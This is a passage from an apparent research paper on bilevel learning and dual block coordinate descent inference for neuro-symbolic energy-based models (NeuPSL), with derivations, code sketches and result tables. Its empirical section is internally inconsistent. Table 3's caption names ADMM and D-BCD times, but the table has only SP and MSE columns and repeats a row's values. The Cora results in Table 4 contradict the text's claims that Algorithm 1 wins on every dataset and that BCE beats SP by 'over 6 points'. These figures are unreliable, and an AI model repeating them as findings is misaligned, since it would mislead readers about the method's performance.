L_{SP}(E(\cdot, \cdot, \cdot, w_{sy}, w_{nn}), S_i) := V_{z_i^*}(w_{sy}, w_{nn}) - V_{y_i^*}(w_{sy}, w_{nn}).
\]
A principled first-order gradient-based method for optimizing a value-based objective only requires differentiability of the value-functions.
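To fix ideas, the following toy Python sketch instantiates the energy and structured perceptron losses for a hypothetical quadratic energy whose minimizers are available in closed form; in a real NeSy-EBM, $z_i^*$ and $y_i^*$ would instead be obtained by running symbolic inference.

```python
import numpy as np

def energy(y, w):
    # hypothetical stand-in energy: E(y; w) = 0.5 * ||y - w||^2
    return 0.5 * np.sum((y - w) ** 2)

def latent_value(t_i, w):
    # V_{z*}: minimize over the latent block z with the labels t_i clamped
    z_star = w[len(t_i):]                 # closed form for this toy energy
    return energy(np.concatenate([t_i, z_star]), w)

def full_value(w):
    # V_{y*}: minimize over all targets; here y* = w and the minimum value is 0
    return energy(w, w)

w = np.array([0.2, 0.9, 0.4, 0.7])        # flattened model parameters
t_i = np.array([0.0, 1.0])                # truth for the labeled targets

L_energy = latent_value(t_i, w)           # energy loss
L_sp = L_energy - full_value(w)           # structured perceptron loss
print(L_energy, L_sp)                     # equal here, since full_value(w) = 0
```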
However, performance metrics are not always aligned with value-based losses. Moreover, they are known to have degenerate solutions, e.g., weights minimizing the loss but producing a collapsed energy function (LeCun et al., 2006; Pryor et al., 2023). Alternatively, **minimizer-based** learning losses assume the minimizer of the energy function is unique. With this assumption, energy minimization is a vector-valued function from the weight space $W_{sy} \times W_{nn}$ to the target space $Y$, $y_i^*(w_{sy}, w_{nn}) : W_{sy} \times W_{nn} \rightarrow Y$. Then, minimizer-based losses are compositions of a differentiable supervised loss $d : Y \times Y \rightarrow \mathbb{R}$, and the minimizer:
\[
L_d(E(\cdot, \cdot, \cdot, w_{sy}, w_{nn}), S_i) := d(y_i^*(w_{sy}, w_{nn}), t_i).
\]
Minimizer-based losses are general and allow learning with objectives aligned with evaluation metrics. However, a direct application of a first-order gradient-based method for minimizer-based learning requires the Jacobian at the minimizer. NeSy-EBM predictions are not necessarily differentiable. Even if they are differentiable, the computation of the Jacobian is often too expensive to be practical.

### 4 A BILEVEL NESy LEARNING FRAMEWORK

In this section, we introduce a general framework for the bilevel NeSy learning problem:
\[
\begin{align*}
\arg\min_{(w_{sy}, w_{nn}) \in W_{sy} \times W_{nn}} & \sum_{i=1}^{P} (d(y_i, t_i) + L_{Val}(E(\cdot, \cdot, \cdot, w_{sy}, w_{nn}), S_i)) + R(w_{sy}, w_{nn}) \\
\text{s.t.} & \quad y_i \in \arg\min_{y \in Y} E(y, x_{i,sy}, x_{i,nn}, w_{sy}, w_{nn}), \quad \forall i \in \{1, \ldots, P\}
\end{align*} \tag{7}
\]
where $d$ and $L_{Val}$ are a minimizer and value-based loss, respectively, and $R : W_{sy} \times W_{nn} \rightarrow \mathbb{R}$ is a regularizer. We make the following (standard) lower-level singleton assumption.

**Assumption 4.1.** $E$ is minimized over $y \in Y$ at a single point for every $(w_{sy}, w_{nn}) \in W_{sy} \times W_{nn}$.

Under Assumption 4.1, and regardless of the continuity and curvature properties of the upper and lower level objectives, (7) is equivalent to the following:
\[
\begin{align*}
\arg\min_{(w_{sy}, w_{nn}) \in W_{sy} \times W_{nn}} & \sum_{i=1}^{P} (d(y_i, t_i) + L_{Val}(E(\cdot, \cdot, \cdot, w_{sy}, w_{nn}), S_i)) + R(w_{sy}, w_{nn}) \\
\text{s.t.} & \quad E(y_i, x_{i,sy}, x_{i,nn}, w_{sy}, w_{nn}) - V_{y_i^*}(w_{sy}, w_{nn}) \leq 0, \quad \forall i \in \{1, \ldots, P\}.
\end{align*} \tag{8}
\]
The formulation in (8) is referred to as a **value-function** approach in the bilevel optimization literature (Outrata, 1990; Liu et al., 2021; 2022; Sow et al., 2022; Kwon et al., 2023). Value-function approaches view the bilevel program as a single-level constrained optimization problem by leveraging the value-function as a tight lower bound on the lower-level objective. However, the inequality constraints in (8) do not satisfy any of the standard constraint qualifications that ensure the feasible set near the optimal point is similar to its linearized approximation (Nocedal & Wright, 2006). This raises a challenge for providing theoretical convergence guarantees for constrained optimization techniques. Following a recent line of value-function approaches to bilevel programming (Liu et al., 2021; Sow et al., 2022; Liu et al., 2023), we overcome this challenge by allowing at most an $\epsilon > 0$ violation in each constraint in (8).
With this relaxation, strictly feasible points exist and, for instance, the linear independence constraint qualification (LICQ) can hold. Another challenge that arises from (8) is that the energy function of NeSy-EBMs is typically non-differentiable with respect to the targets and even infinite-valued to implicitly represent constraints. As a result, penalty or augmented Lagrangian functions derived from (8) are intractable. Therefore, we substitute each instance of the energy function evaluated at the training sample $i$ and parameterized by $(w_{sy}, w_{nn})$ in the constraints of (8) with the following function:
\[
M_i(y; w_{sy}, w_{nn}, \rho) := \inf_{\hat{y} \in Y} \left( E(\hat{y}, x_{i,sy}, x_{i,nn}, w_{sy}, w_{nn}) + \frac{1}{2\rho} \| \hat{y} - y \|^2_2 \right), \tag{9}
\]
where $\rho$ is a positive scalar. For convex $E$, (9) is the Moreau envelope of the energy function (Rockafellar, 1970; Parikh & Boyd, 2013). In general, even for non-convex energy functions, the smoothing in (9) preserves global minimizers and minimum values, i.e., $y^*_i(w_{sy}, w_{nn}) = \arg\min_y M_i(y; w_{sy}, w_{nn}, \rho)$ and $V_{y^*_i}(w_{sy}, w_{nn}) = \min_y M_i(y; w_{sy}, w_{nn}, \rho)$. Moreover, under Assumption 4.1, each $M_i$ is finite for all $y \in Y$ even if the energy function is not. When the energy function is a lower semi-continuous convex function, its Moreau envelope is convex, finite, and continuously differentiable, and its gradient with respect to $y$ is:
\[
\nabla_y M_i(y; w_{sy}, w_{nn}, \rho) = \frac{1}{\rho} \left( y - \arg\min_{\hat{y} \in Y} \left( \rho E(\hat{y}, x_{i,sy}, x_{i,nn}, w_{sy}, w_{nn}) + \frac{1}{2} \| \hat{y} - y \|^2_2 \right) \right). \tag{10}
\]
Convexity is a sufficient but not necessary condition to ensure each $M_i$ is differentiable with respect to the target variables. See Bonnans & Shapiro (2000) for results regarding the sensitivity of optimal value-functions to perturbations. We propose the following relaxed and smoothed value-function approach to finding an approximate solution of (7):
\[
\begin{align*}
\arg\min_{(w_{sy}, w_{nn}) \in W_{sy} \times W_{nn}} & \sum_{i=1}^{P} (d(y_i, t_i) + L_{Val}(E(\cdot, \cdot, \cdot, w_{sy}, w_{nn}), S_i)) + R(w_{sy}, w_{nn}) \\
\text{s.t.} & \quad M_i(y_i; w_{sy}, w_{nn}, \rho) - V_{y^*_i}(w_{sy}, w_{nn}) \leq \epsilon, \quad \forall i \in \{1, \cdots, P\}.
\end{align*} \tag{11}
\]
The formulation (11) is the core of our proposed NeSy-EBM learning framework outlined in Algorithm 1. The algorithm proceeds by approximately solving instances of (11) in a sequence defined by a decreasing $\epsilon$. This is a graduated approach to solving (8) with instances of (11) that are increasingly tighter approximations. Each instance of (11) is optimized using only first-order gradients of the energy and value-functions with the bound-constrained augmented Lagrangian algorithm, Algorithm 17.4 from Nocedal & Wright (2006). Specifically, the algorithm finds approximate minimizers of the problem's augmented Lagrangian for a fixed setting of the penalty parameters using gradient descent. To simplify notation, let the inequality constraints in (11) be denoted by:
\[
c_i(y_i, w_{sy}, w_{nn}; t) := M_i(y_i; w_{sy}, w_{nn}, \rho) - V_{y_i^*}(w_{sy}, w_{nn}) - t, \tag{12}
\]
for each constraint indexed $i \in \{1, \cdots, P\}$, where $t > 0$ denotes the current constraint relaxation (the $\epsilon$ in (11)). Moreover, let $c(y_1, \cdots, y_P, w_{sy}, w_{nn}; t) := [c_i(y_i, w_{sy}, w_{nn}; t)]_{i=1}^{P}$.
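Before assembling the augmented Lagrangian, a one-dimensional sketch of the smoothing in (9)–(10) may help. For the non-smooth convex energy $E(y) = |y|$, the infimum in (9) has the familiar soft-thresholding solution, and (10) recovers the gradient of the resulting (Huber-like) envelope; the example is ours, not part of the framework.

```python
import numpy as np

def moreau_envelope(y, rho):
    # E(y) = |y|; the prox step solves the infimum in (9) via soft-thresholding
    prox = np.sign(y) * np.maximum(np.abs(y) - rho, 0.0)
    M = np.abs(prox) + (prox - y) ** 2 / (2.0 * rho)
    grad = (y - prox) / rho            # gradient formula (10)
    return M, grad

ys = np.linspace(-2.0, 2.0, 9)
M, g = moreau_envelope(ys, rho=0.5)
print(M)   # finite and smooth everywhere, even though |y| is non-smooth at 0
print(g)   # clipped to [-1, 1]: the Moreau envelope of |y| is the Huber function
```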
The augmented Lagrangian function corresponding to (11) introduces a quadratic penalty parameter $\mu$ and $P$ linear penalty parameters $\lambda := [\lambda_i]_{i=1}^{P}$, as follows:
\[
L_A(w_{sy}, w_{nn}, y_1, \cdots, y_P, s; \lambda, \mu, t) := \sum_{i=1}^{P} (d(y_i, t_i) + L_{Val}(E(\cdot, \cdot, \cdot, w_{sy}, w_{nn}), S_i)) + \frac{\mu}{2} \sum_{i=1}^{P} (c_i(y_i, w_{sy}, w_{nn}; t) + s_i)^2 + \sum_{i=1}^{P} \lambda_i(c_i(y_i, w_{sy}, w_{nn}; t) + s_i) + R(w_{sy}, w_{nn}), \tag{13}
\]
where we introduced $P$ slack variables, $s = [s_i]_{i=1}^P$, one for each inequality constraint. We make the following assumption to ensure the augmented Lagrangian function is differentiable:

**Assumption 4.2.** Every $V_{y_i^*}$, $V_{z_i^*}$, and $M_i$ is differentiable with respect to the weights.

We employ the bound-constrained augmented Lagrangian algorithm to solve (11) (see Appendix B for details). This method provides a principled algorithm for updating the penalty parameters and ensures fundamental convergence properties of our learning framework. Notably, we have that limit points of the iterate sequence are stationary points of $\|c(y_1, \cdots, y_P, w_{sy}, w_{nn}; t) + s\|^2$ when the problem has no feasible points. When the problem is feasible and LICQ holds at the limits, they are KKT points of (11) (Theorem 17.2 in Nocedal & Wright (2006)). Convergence rates and stronger guarantees are likely possible by analyzing the structure of the energy function for specific NeSy-EBMs; this is a direction for future work. The value for $t$ is halved every time an approximate solution to the Lagrangian subproblem is reached. We suggest starting points for each $y_i^{(0)}$ to be the latent inference minimizer and $t^{(0)}$ to be the maximum difference between the value-function and the smoothed energy function over all $y_i^{(0)}$. The outer loop of the NeSy-EBM learning framework may be stopped by either monitoring the progress of a training or validation evaluation metric, or by specifying a final value for $t$.

5 NEUPSL AND DEEP HINGE-LOSS MARKOV RANDOM FIELDS

We demonstrate the applicability of our learning framework with Neural Probabilistic Soft Logic (NeuPSL), a general class of NeSy-EBMs designed for scalable joint reasoning (Pryor et al., 2023). In NeuPSL, relations and attributes are represented by atoms, and dependencies between atoms are encoded with first-order logical clauses and linear arithmetic inequalities referred to as rules. Atom values can be target variables, observations, or outputs from a neural network. The rules and atoms are translated into potentials measuring rule satisfaction and are aggregated to define a member of a tractable class of graphical models: deep hinge-loss Markov random fields (deep HL-MRFs).

**Definition 5.1.** Let $g = [g_i]_{i=1}^{n_g}$ be functions with corresponding weights $w_{nn} = [w_{nn,i}]_{i=1}^{n_g}$ and inputs $x_{nn}$ such that $g_i : (w_{nn,i}, x_{nn}) \mapsto [0, 1]$. Let $y \in [0, 1]^{n_y}$ and $x_{sy} \in [0, 1]^{n_x}$. A deep hinge-loss potential is a function of the form:
$$\phi(y, x_{sy}, g(x_{nn}, w_{nn})) := \max\{a_{\phi,y}^T y + a_{\phi,x_{sy}}^T x_{sy} + a_{\phi,g}^T g(x_{nn}, w_{nn}) + b_\phi, 0\}^p, \tag{14}$$
where $a_{\phi,y} \in \mathbb{R}^{n_y}$, $a_{\phi,x_{sy}} \in \mathbb{R}^{n_x}$, and $a_{\phi,g} \in \mathbb{R}^{n_g}$ are variable coefficient vectors, $b_\phi \in \mathbb{R}$ is a constant, and $p \in \{1, 2\}$. Let $\mathcal{T} = [\tau_j]_{j=1}^{r}$ denote an ordered partition of a set of $m$ deep hinge-loss potentials into $r$ subsets.
Further, define $\Phi(y, x_{sy}, g(x_{nn}, w_{nn})) := \left[\sum_{k \in \tau_j} \phi_k(y, x_{sy}, g(x_{nn}, w_{nn}))\right]_{j=1}^{r}$. Let $w_{sy}$ be a vector of $r$ non-negative symbolic weights corresponding to the partition $\mathcal{T}$. Then, a deep hinge-loss energy function is:
$$E(y, x_{sy}, x_{nn}, w_{sy}, w_{nn}) := w_{sy}^T \Phi(y, x_{sy}, g(x_{nn}, w_{nn})).$$
Let $a_{ck,y} \in \mathbb{R}^{n_y}$, $a_{ck,x_{sy}} \in \mathbb{R}^{n_x}$, $a_{ck,g} \in \mathbb{R}^{n_g}$, and $b_{ck} \in \mathbb{R}$, for each $k = 1, \ldots, q$ with $q \geq 0$, be coefficients defining linear inequality constraints and a feasible set:
$$\Omega(x_{sy}, g) := \left\{y \in [0, 1]^{n_y} \mid a_{ck,y}^T y + a_{ck,x_{sy}}^T x_{sy} + a_{ck,g}^T g + b_{ck} \leq 0, \forall k = 1, \ldots, q\right\}.$$
Then a deep hinge-loss Markov random field defines the conditional probability density:
$$P(y | x_{sy}, x_{nn}) := \begin{cases} \exp(-E(y, x_{sy}, x_{nn}, w_{sy}, w_{nn})) / \int_{y' \in \Omega(\cdot)} \exp(-E(y', x_{sy}, x_{nn}, w_{sy}, w_{nn})) dy' & y \in \Omega(x_{sy}, g(x_{nn}, w_{nn})) \\ 0 & \text{o.w.} \end{cases}$$

NeuPSL inference is finding the MAP state of the conditional distribution defined by a deep HL-MRF, i.e., finding the minimizer of the energy function over the feasible set:
$$\min_{y \in \mathbb{R}^{n_y}} w_{sy}^T \Phi(y, x_{sy}, g(x_{nn}, w_{nn})) \quad \text{s.t. } y \in \Omega(x_{sy}, g(x_{nn}, w_{nn})). \tag{15}$$
As each of the potentials is convex, (15) is a non-smooth convex linearly constrained program.

5.1 A smooth formulation of inference

In this section, we introduce a primal and dual formulation of NeuPSL inference as a linearly constrained convex quadratic program (LCQP). (See Appendix C.1 for details.) In summary, $m$ slack variables with lower bounds and $2 \cdot n_y + m$ linear constraints are defined to represent the target variable bounds and deep hinge-loss potentials. All $2 \cdot n_y + m$ variable bounds, $m$ potentials, and $q \geq 0$ constraints are collected into a $(2 \cdot n_y + q + 2 \cdot m) \times (n_y + m)$ dimensional matrix $A$ and a vector of $(2 \cdot n_y + q + 2 \cdot m)$ elements that is an affine function of the neural predictions and symbolic inputs, $b(x_{sy}, g(x_{nn}, w_{nn}))$. Moreover, the slack variables and a $(n_y + m) \times (n_y + m)$ positive semi-definite diagonal matrix, $D(w_{sy})$, and a $(n_y + m)$ dimensional vector, $c(w_{sy})$, are created using the symbolic weights to define a quadratic objective. Further, we gather the original target variables and the slack variables into a vector $\nu \in \mathbb{R}^{n_y+m}$. Altogether, the regularized convex LCQP reformulation of NeuPSL inference is:
\[
V(w_{sy}, b(x_{sy}, g(x_{nn}, w_{nn}))) := \min_{\nu \in \mathbb{R}^{n_y+m}} \nu^T(D(w_{sy}) + \epsilon I)\nu + c(w_{sy})^T\nu \quad \text{s.t. } A\nu + b(x_{sy}, g(x_{nn}, w_{nn})) \leq 0, \tag{16}
\]
where $\epsilon \geq 0$ is a scalar regularization parameter added to the diagonal of $D$ to ensure strong convexity (needed in the next subsection). The effect of the added regularization is empirically studied in Appendix E.3. The function $V(w_{sy}, b(x_{sy}, g(x_{nn}, w_{nn})))$ in (16) is the optimal value-function of the LCQP formulation of NeuPSL inference referred to in the previous section. By Slater's constraint qualification, we have strong duality when there is a feasible solution to (16). In this case, an optimal solution to the dual problem yields an optimal solution to the primal problem.
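As a concrete illustration of the potentials that populate this LCQP, the sketch below instantiates Definition 5.1 for one grounded rule under the standard Łukasiewicz relaxation; the rule, names, and values are our own hypothetical example.

```python
import numpy as np

def hinge_potential(y, x_sy, g, a_y, a_x, a_g, b, p=1):
    # phi = max(a_y^T y + a_x^T x_sy + a_g^T g + b, 0)^p   (Definition 5.1)
    return max(a_y @ y + a_x @ x_sy + a_g @ g + b, 0.0) ** p

# Hypothetical grounded rule "Link(A,B) & Label(A) -> Label(B)": with observed
# Link(A,B) = x, neural prediction Label(A) = g, and target Label(B) = y, its
# Lukasiewicz distance to satisfaction is max(x + g - 1 - y, 0).
y = np.array([0.3])        # target atom: Label(B)
x_sy = np.array([1.0])     # observed atom: Link(A,B)
g = np.array([0.9])        # neural output: Label(A)
phi = hinge_potential(y, x_sy, g,
                      a_y=np.array([-1.0]), a_x=np.array([1.0]),
                      a_g=np.array([1.0]), b=-1.0)
print(phi)   # 0.6: the rule is violated by this assignment
```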
Returning to (16), its Lagrange dual problem is:
\[
\min_{\mu \in \mathbb{R}^{2 n_y + q + 2m}_{\geq 0}} h(\mu; w_{sy}, b(x_{sy}, g(x_{nn}, w_{nn})))
\]
\[
:= \frac{1}{4}\mu^T A(D(w_{sy}) + \epsilon I)^{-1}A^T\mu + \frac{1}{2}(A(D(w_{sy}) + \epsilon I)^{-1}c(w_{sy}) - 2b(x_{sy}, g(x_{nn}, w_{nn})))^T\mu, \tag{17}
\]
where $\mu$ is the vector of non-negative dual variables (one per inequality constraint of (16)) and $h(\mu; w_{sy}, b(x_{sy}, g(x_{nn}, w_{nn})))$ is the LCQP dual objective function. As $(D(w_{sy}) + \epsilon I)$ is diagonal, it is easy to invert, and thus it is practical to work in the dual space and map dual to primal variables. The dual-to-primal variable mapping is:
\[
\nu \leftarrow -\frac{1}{2}(D(w_{sy}) + \epsilon I)^{-1}(A^T\mu + c(w_{sy})). \tag{18}
\]
On the other hand, the primal-to-dual mapping is more computationally expensive and requires calculating a pseudo-inverse of the constraint matrix $A$.

5.2 Continuity of inference

We use the LCQP formulation in (16) to establish continuity and curvature properties of the NeuPSL energy minimizer and the optimal value-function, provided in the following theorem. The proof is provided in Appendix C.2.

**Theorem 5.2.** Suppose for any setting of $w_{nn} \in \mathbb{R}^{n_g}$ there is a feasible solution to NeuPSL inference (16). Further, suppose $\epsilon > 0$, $w_{sy} \in \mathbb{R}_+^{r}$, and $w_{nn} \in \mathbb{R}^{n_g}$. Then:

- The minimizer of (16), $y^*(w_{sy}, w_{nn})$, is an $O(1/\epsilon)$-Lipschitz continuous function of $w_{sy}$.
- $V(w_{sy}, b(x_{sy}, g(x_{nn}, w_{nn})))$ is concave over $w_{sy}$ and convex over $b(x_{sy}, g(x_{nn}, w_{nn}))$.
- $V(w_{sy}, b(x_{sy}, g(x_{nn}, w_{nn})))$ is differentiable with respect to $w_{sy}$. Moreover,
\[
\nabla_{w_{sy}} V(w_{sy}, b(x_{sy}, g(x_{nn}, w_{nn}))) = \Phi(y^*(w_{sy}, w_{nn}), x_{sy}, g(x_{nn}, w_{nn})).
\]
Furthermore, $\nabla_{w_{sy}} V(w_{sy}, b(x_{sy}, g(x_{nn}, w_{nn})))$ is Lipschitz continuous over $w_{sy}$.
- If there is a feasible point $\nu$ strictly satisfying the $i$th inequality constraint of (16), i.e., $A[i]\nu + b(x_{sy}, g(x_{nn}, w_{nn}))[i] < 0$, then $V(w_{sy}, b(x_{sy}, g(x_{nn}, w_{nn})))$ is subdifferentiable with respect to the $i$th constraint constant $b(x_{sy}, g(x_{nn}, w_{nn}))[i]$. Moreover,
\[
\partial_{b[i]} V(w_{sy}, b(x_{sy}, g(x_{nn}, w_{nn}))) = \{\mu^*[i] \mid \mu^* \in \arg\min_{\mu \in \mathbb{R}^{2 n_y + q + 2m}_{\geq 0}} h(\mu; w_{sy}, b(x_{sy}, g(x_{nn}, w_{nn})))\}.
\]
Furthermore, if $g(x_{nn}, w_{nn})$ is a smooth function of $w_{nn}$, then so is $b(x_{sy}, g(x_{nn}, w_{nn}))$, and the set of regular subgradients of $V(w_{sy}, b(x_{sy}, g(x_{nn}, w_{nn})))$ satisfies:
\[
\partial_{w_{nn}} V(w_{sy}, b(x_{sy}, g(x_{nn}, w_{nn}))) \supset \nabla_{w_{nn}} b(x_{sy}, g(x_{nn}, w_{nn}))^T \partial_b V(w_{sy}, b(x_{sy}, g(x_{nn}, w_{nn}))).
\]

Theorem 5.2 provides a simple explicit form of the value-function gradient with respect to the symbolic weights and regular subgradient with respect to the neural weights. Moreover, this result is directly applicable to the Moreau envelope of the NeuPSL energy function used in Section 4, as it is a regularized value-function. Thus, Theorem 5.2 supports the principled application of Algorithm 1 for learning both the symbolic and neural weights of a NeuPSL model.

5.3 Dual block coordinate descent

The regular subgradients in Theorem 5.2 are functions of the optimal dual variables of the LCQP inference problem in (17).
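A toy numeric sketch of (17)–(18) may make this concrete. We use a projected-gradient loop as a crude stand-in for the dual BCD algorithm of Section 5.3; the problem sizes and data are arbitrary and of our own choosing.

```python
import numpy as np

rng = np.random.default_rng(0)
n_vars, n_cons = 4, 6
D = np.diag(rng.random(n_vars) + 0.1)       # plays the role of D(w_sy) + eps*I
c = rng.standard_normal(n_vars)
A = rng.standard_normal((n_cons, n_vars))
b = -np.abs(rng.standard_normal(n_cons)) - 0.5   # nu = 0 is strictly feasible
Dinv = np.diag(1.0 / np.diag(D))             # diagonal, so inversion is trivial

H = 0.5 * A @ Dinv @ A.T                     # Hessian of the dual objective (17)
r = 0.5 * (A @ Dinv @ c - 2.0 * b)           # linear part of its gradient
step = 1.0 / np.linalg.eigvalsh(H).max()

mu = np.zeros(n_cons)
for _ in range(5000):
    mu = np.maximum(mu - step * (H @ mu + r), 0.0)   # project onto mu >= 0

nu = -0.5 * Dinv @ (A.T @ mu + c)            # dual-to-primal map (18)
print(np.max(A @ nu + b))                    # <= ~0: primal feasible at optimality
```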
Since the learning gradients are exposed by these optimal dual variables, we introduce a block coordinate descent (BCD) (Wright, 2015) algorithm for working directly with the dual LCQP formulation of inference. Details of the algorithm are provided in Appendix D. Our dual BCD algorithm is the first method specialized for the dual LCQP inference and is therefore also the first to produce optimal dual variables that directly yield both optimal primal variables and principled gradients for learning, all without the need to compute a pseudo-inverse of the constraint matrix. The dual BCD algorithm proceeds by successively minimizing the objective along the subgradient of a block of dual variables. For this reason, dual BCD guarantees descent at every iteration, partially explaining its effectiveness at leveraging warm-starts and improving learning runtimes. The algorithm is stopped when the primal-dual gap drops below a threshold $\delta > 0$. We suggest a practical choice of variable blocks with efficient methods for computing the objective subgradients and solving the steplength subproblems. Additionally, we develop an efficient method for identifying connected components of the factor graph defined by the deep HL-MRF, yielding a variable partition over which the dual objective is additively separable, to parallelize the BCD updates. Moreover, inspired by lock-free parallelization strategies (Bertsekas & Tsitsiklis, 1989; Recht et al., 2011; Liu et al., 2015), we also propose a variant of the dual BCD inference algorithm that sacrifices the theoretically guaranteed descent property for significant runtime improvements. In Section 6, we show that the lock-free dual BCD algorithm consistently finds a solution satisfying the stopping criterion, and surprisingly, is still highly effective at leveraging warm starts.

6 EMPIRICAL EVALUATION

We evaluate the runtime and prediction performance of our proposed NeSy inference and parameter learning algorithms on the 8 datasets in Table 1. The table includes each dataset's inference task, the associated prediction performance metric, and whether the corresponding NeuPSL model has deep neural network parameters. Unless noted otherwise, all experiments are run on 5 splits and the average and standard deviation of times and performance metric values are reported. Details on the datasets, hardware specifications, hyperparameter searches, and model architectures are provided in Appendix E.

For the learning experiments in Section 6.2 and Section 6.3, NeuPSL models with weights trained using value-based learning losses, e.g., energy and structured perceptron (SP), use mirror descent (Kivinen & Warmuth, 1997; Shalev-Shwartz, 2012) on the symbolic weights constrained to the unit simplex and Adam (Kingma & Ba, 2017) for the neural weights. NeuPSL models with weights trained using minimizer-based losses, e.g., mean squared error (MSE) and binary cross entropy (BCE), use our proposed NeSy learning framework in Algorithm 1, with a scaled energy loss term added to the objective as in (7). Moreover, optimization of the augmented Lagrangian, line 4 of Algorithm 1, is performed using the bound-constrained augmented Lagrangian algorithm (Appendix B) with mirror descent on the symbolic weights and Adam for the neural weights.

Table 1: Datasets used for empirical evaluations.

| Dataset | Deep | Task | Perf. Metric |
|------------------------------------|------|---------------|--------------|
| CreateDebate (Hasan & Ng, 2013) | | Stance Class. | AUROC |
| 4Forums (Walker et al., 2012) | | Stance Class. | AUROC |
| Epinions (Richardson et al., 2003) | | Link Pred. | AUROC |
| DDI (Ramesh et al., 2009) | | Link Pred. | AUROC |
| Yelp | | Regression | MAE |
| Citeseer (Sen et al., 2008) | ✓ | Node Class. | Accuracy |
| Cora (Sen et al., 2008) | ✓ | Node Class. | Accuracy |
| MNIST-Add (Manhaeve et al., 2018) | ✓ | Image Class. | Accuracy |
¹ All code and data are available at https://github.com/convexbilevelnesylearning

6.1 Inference Runtime

We begin by examining the runtime of symbolic inference. We evaluate the alternating direction method of multipliers (ADMM) (Boyd et al., 2010), the current state-of-the-art inference algorithm for NeuPSL, and our proposed inference algorithms: connected-component parallel dual BCD (CC D-BCD) and lock-free parallel dual BCD (LF D-BCD). We also evaluate the performance of Gurobi, a leading off-the-shelf optimizer, and subgradient descent (GD) in Appendix E.4. All inference algorithms have access to the same computing resources. We run a hyperparameter search, detailed in Appendix E.4, for each algorithm, and the configuration yielding a prediction performance that is within a standard deviation of the best and completed with the lowest runtime is reported. All algorithms are stopped when the $L_\infty$ norm of the primal variable change between iterates is less than 0.001.

The total average inference runtime in seconds for each algorithm and model is provided in Table 2. Surprisingly, despite the potential for an inexact solution to the BCD steplength subproblem, LF D-BCD is faster than CC D-BCD on the first 7 datasets and demonstrates up to a $6\times$ speedup over CC D-BCD on Yelp. However, on the MNIST-Add datasets, CC D-BCD is up to $10\times$ faster than LF D-BCD, as there is a high number of tightly connected components, one for each addition instance. This behavior highlights the complementary strengths of the two parallelization strategies. LF D-BCD should be applied to problems with larger factor graph representations that are connected, while CC D-BCD is effective when there are many similarly sized connected components.

6.2 Learning Runtime

Next, we study how the algorithms applied to solve inference affect the learning runtime with the SP and MSE losses. Specifically, we examine the cumulative time required for ADMM and D-BCD inference to complete 500 weight updates on the first 7 datasets in Table 1 and 100 weight updates on the MNIST-Add datasets. Hyperparameters used for SP and MSE learning are reported in Appendix E.5. For inference, we apply the same hyperparameters used in the previous section and the fastest parallelization method for D-BCD. Table 3 shows that the D-BCD algorithm consistently results in the lowest total inference runtime, validating its ability to leverage warm starts to improve learning runtimes. Notably, on the DDI dataset, D-BCD achieves roughly a $100\times$ speedup over ADMM. Moreover, on MNIST-Add2, ADMM timed out with over 6 hours of inference time for SP and MSE learning, while D-BCD accumulated less than 0.5 and 1.2 hours of inference runtime on average for SP and MSE, respectively.

6.3 Learning Prediction Performance

In our final experiment, we analyze the prediction performance of NeuPSL models trained with our NeSy-EBM learning framework. A hyperparameter search (detailed in Appendix E.6) is performed over learning steplengths, regularizations, and parameters for Algorithm 1.
Table 2: Time in seconds for inference using ADMM and our proposed CC D-BCD and LF D-BCD algorithms on each dataset.

| Dataset | ADMM | CC D-BCD | LF D-BCD |
|--------------|--------------|---------------|--------------|
| CreateDebate | 9.98 ± 1.13 | 0.05 ± 0.02 | 0.05 ± 0.03 |
| 4Forums | 15.17 ± 0.74 | 0.11 ± 0.02 | 0.05 ± 0.01 |
| Epinions | 0.36 ± 0.041 | 1.84 ± 0.4 | 0.26 ± 0.04 |
| Citeseer | 0.63 ± 0.07 | 1.36 ± 0.24 | 0.49 ± 0.08 |
| Cora | 0.71 ± 0.07 | 6.46 ± 3.5 | 0.79 ± 0.19 |
| DDI | 7.85 ± 0.38 | 31.47 ± 17.7 | 1.76 ± 0.17 |
| Yelp | 6.37 ± 1.19 | 15.82 ± 10.35 | 1.25 ± 0.85 |
| MNIST-Add1 | 11.45 ± 1.32 | 10.23 ± 1.04 | 115 ± 45 |
| MNIST-Add2 | 285 ± 66 | 29.09 ± 8.00 | 1,189 ± 16 |

Table 3: Cumulative time in seconds for ADMM and D-BCD inference during learning with SP and MSE losses.

| Dataset | SP | MSE |
|--------------|---------------|--------------|
| CreateDebate | 10.68 ± 8.63 | 0.34 ± 0.36 |
| 4Forums | 11.87 ± 12.81 | 0.65 ± 0.05 |
| Epinions | 12.54 ± 0.37 | 1.33 ± 0.06 |
| Citeseer | 167 ± 37 | 41.57 ± 6.39 |
| Cora | 18.4 ± 16 | 19.65 ± 3.0 |
| DDI | 4,554 ± 13 | 19.65 ± 3.0 |
| Yelp | 1,835 ± 47 | 114 ± 4 |
| MNIST-Add1 | 1,624 ± 34 | 232 ± 44 |
| MNIST-Add2 | TIME-OUT | 804 ± 106 |

Table 4: Prediction performance of HL-MRF models trained on value- and minimizer-based losses.

| Dataset | Energy | SP | MSE | BCE |
|--------------|--------------|---------------|---------------|--------------|
| CreateDebate | 64.76 ± 9.54 | 64.68 ± 11.05 | 65.33 ± 11.98 | 64.83 ± 9.70 |
| 4Forums | 62.96 ± 11.1 | 63.15 ± 4.40 | 64.22 ± 6.41 | 64.85 ± 6.01 |
| Epinions | 78.96 ± 2.29 | 79.85 ± 1.62 | 81.18 ± 2.21 | 80.84 ± 2.32 |
| Citeseer | 70.29 ± 7.86 | 70.29 ± 7.86 | 71.09 ± 7.86 | 71.09 ± 7.86 |
| Cora | 94.54 ± 1.74 | 71.16 ± 2.32 | 94.05 ± 1.41 | 87.67 ± 1.31 |
| DDI | 94.54 ± 0.00 | 94.61 ± 0.00 | 94.70 ± 0.00 | 95.08 ± 0.00 |
| Yelp | 18.11 ± 0.34 | 18.57 ± 0.66 | 18.14 ± 0.36 | 17.93 ± 0.50 |

**HL-MRF learning** We first evaluate the prediction performance on non-deep variants of NeuPSL models for the first 7 datasets, i.e., only symbolic weights are learned. Table 4 shows that across all 7 datasets, NeuPSL models trained with Algorithm 1 obtain a better average prediction performance than those trained using a value-based loss. On the Cora dataset, the NeuPSL model fit with the BCE loss achieves over a 6 percentage point improvement over SP, the higher-performing value-based loss.

